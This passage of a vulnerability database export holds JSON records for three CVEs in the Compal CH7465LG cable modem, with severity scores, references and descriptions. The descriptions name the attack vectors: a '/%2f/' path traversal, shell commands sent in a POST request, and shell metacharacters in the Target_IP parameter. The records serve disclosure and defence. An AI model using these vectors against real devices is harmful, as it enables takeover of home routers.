"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2019-17224",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-17224",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-17224",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-17224",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-39938",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-1550",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web interface of the Compal Broadband CH7465LG modem (version CH7465LG-NCIP-6.12.18.25-2p6-NOSH) is vulnerable to a /%2f/ path traversal attack, which can be exploited in order to test for the existence of a file pathname outside of the web root directory. If a file exists but is not part of the product, there is a 404 error. If a file does not exist, there is a 302 redirect to index.html. Compal Broadband CH7465LG Modem contains a path traversal vulnerability.Information may be obtained. The Compal Broadband CH7465LG modem is a modem from Compal, Taiwan",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-17224"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNVD",
"id": "CNVD-2019-39938"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-17224",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-39938",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"id": "VAR-201910-0452",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
}
],
"trust": 1.3777778
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
}
]
},
"last_update_date": "2024-11-23T23:11:42.724000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://vulnerabilities.home.blog/2019/10/27/again-a-vunerability-in-cable-router-ch7465lg-cve-2019-17224/"
},
{
"trust": 2.2,
"url": "https://www.search-lab.hu/media/compal_ch7465lg_evaluation_report_1.1.pdf"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17224"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17224"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"date": "2019-11-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"date": "2019-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"date": "2019-10-28T15:15:14.240000",
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"date": "2019-11-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"date": "2019-11-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"date": "2024-11-21T04:31:53.877000",
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband CH7465LG Modem Path Traversal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
}
],
"trust": 2.0
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
}
],
"trust": 0.6
}
}
VAR-201910-0650
Vulnerability from variot - Updated: 2024-11-23 23:01Compal CH7465LG CH7465LG-NCIP-6.12.18.24-5p8-NOSH devices have Incorrect Access Control because of Improper Input Validation. The attacker can send a maliciously modified POST (HTTP) request containing shell commands, which will be executed on the device, to an backend API endpoint of the cable modem. Compal CH7465LG The device contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Compal CH7465LG is a wireless router manufactured by Compal Computer Industries (Compal) in Taiwan, China
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-0650",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ch7465lg",
"scope": "eq",
"trust": 1.0,
"vendor": "compal",
"version": "ch7465lg-ncip-6.12.18.24-5p8-nosh"
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch7465lg-ncip-6.12.18.24-5p8-nosh"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:compal_broadband_networks:ch7465lg_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
}
]
},
"cve": "CVE-2019-13025",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-13025",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-144830",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-13025",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-13025",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-13025",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2019-13025",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-137",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-144830",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal CH7465LG CH7465LG-NCIP-6.12.18.24-5p8-NOSH devices have Incorrect Access Control because of Improper Input Validation. The attacker can send a maliciously modified POST (HTTP) request containing shell commands, which will be executed on the device, to an backend API endpoint of the cable modem. Compal CH7465LG The device contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Compal CH7465LG is a wireless router manufactured by Compal Computer Industries (Compal) in Taiwan, China",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-13025"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "VULHUB",
"id": "VHN-144830"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-13025",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-144830",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"id": "VAR-201910-0650",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
}
],
"trust": 0.6555556
},
"last_update_date": "2024-11-23T23:01:40.290000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-669",
"trust": 1.1
},
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://xitan.me/posts/connect-box-ch7465lg-rce/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13025"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13025"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-02T00:00:00",
"db": "VULHUB",
"id": "VHN-144830"
},
{
"date": "2019-10-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"date": "2019-10-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"date": "2019-10-02T15:15:10.357000",
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-144830"
},
{
"date": "2019-10-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"date": "2024-11-21T04:24:03.430000",
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal CH7465LG Vulnerability related to input validation on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
}
],
"trust": 0.6
}
}
VAR-201910-0684
Vulnerability from variot - Updated: 2024-11-23 22:11The setter.xml component of the Common Gateway Interface on Compal CH7465LG 6.12.18.25-2p4 devices does not properly validate ping command arguments, which allows remote authenticated users to execute OS commands as root via shell metacharacters in the Target_IP parameter. Compal CH7465LG The device includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Compal CH7465LG is a wireless router from Compal Computer Industry (Compal) of Taiwan, China. A remote attacker could use the shell metacharacter in the 'Target_IP' parameter to exploit this vulnerability to execute operating system commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-0684",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ch7465lg",
"scope": "eq",
"trust": 1.6,
"vendor": "compal",
"version": "6.12.18.25-2p4"
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "6.12.18.25-2p4"
},
{
"model": "ch7465lg 6.12.18.25-2p4",
"scope": null,
"trust": 0.6,
"vendor": "compal",
"version": null
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:compal_broadband_networks:ch7465lg_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
}
]
},
"cve": "CVE-2019-17499",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2019-17499",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-36912",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-17499",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-17499",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-17499",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-17499",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2019-36912",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-724",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The setter.xml component of the Common Gateway Interface on Compal CH7465LG 6.12.18.25-2p4 devices does not properly validate ping command arguments, which allows remote authenticated users to execute OS commands as root via shell metacharacters in the Target_IP parameter. Compal CH7465LG The device includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Compal CH7465LG is a wireless router from Compal Computer Industry (Compal) of Taiwan, China. A remote attacker could use the shell metacharacter in the \u0027Target_IP\u0027 parameter to exploit this vulnerability to execute operating system commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-17499"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNVD",
"id": "CNVD-2019-36912"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
